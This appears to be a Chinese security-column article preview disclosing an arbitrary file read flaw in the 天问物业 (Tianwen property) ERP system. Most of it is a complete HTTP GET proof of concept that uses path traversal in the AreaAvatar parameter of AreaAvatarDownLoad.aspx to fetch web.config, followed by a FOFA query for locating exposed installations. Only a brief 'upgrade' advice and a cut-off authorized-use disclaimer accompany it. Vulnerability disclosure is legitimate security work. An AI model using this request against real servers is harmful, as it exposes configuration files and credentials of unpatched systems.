专栏名称: 七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
目录
相关文章推荐
生物学霸  ·  连发三篇 ... ·  3 天前  
BioArt  ·  Cell Metab | ... ·  4 天前  
生物学霸  ·  19 ... ·  4 天前  
生物探索  ·  Nature | ... ·  5 天前  
今天看啥  ›  专栏  ›  七芒星实验室

【护网漏洞】天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取

七芒星实验室  · 公众号  ·  · 2024-07-30 07:00

文章预览

影响范围 天问物业ERP系统 漏洞概述 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取 漏洞复现 应用页面如下所示: 漏洞POC如下: GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 Host : x.x.x.x Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding : gzip, deflate Accept-Language : zh-CN,zh;q=0.9 Connection : close 资产测绘 FOFA检索: body = "天问物业ERP系统" 安全建议 升级到最新版本~ 免责声明 本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任 均由使 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览